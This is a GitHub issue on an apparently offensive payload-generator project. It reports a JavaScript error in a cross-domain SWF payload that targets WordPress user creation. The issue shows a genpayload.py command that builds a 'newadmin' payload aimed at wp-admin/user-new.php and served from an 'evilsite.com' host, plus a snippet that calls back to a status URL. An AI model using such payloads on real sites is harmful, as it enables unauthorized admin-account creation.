Skip to content
This repository was archived by the owner on Feb 9, 2022. It is now read-only.
This repository was archived by the owner on Feb 9, 2022. It is now read-only.

JavaScript error on crossdomain payload: statusurl is not defined #2

@7a

Description

@7a

When I run the following:
./bin/genpayload.py -p wordpress/newadmin -t swf -P usernewpage=http://demosite.com/wordpress-3.2.1/wp-admin/user-new.php -o /var/www/wordpress_newadmin/

And then browse to the generated payload:
http://evilsite.com/wordpress_newadmin/index.html

I get the following JavaScript error message in the console:
ReferenceError: statusurl is not defined
if (statusurl.length > 0)

The bug seems to be in common.js:

function notify(status)
{
if (statusurl.length > 0)
{
nstatusurl = statusurl + '?status=' + escape(status);
$.getScript(nstatusurl);
}
};

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions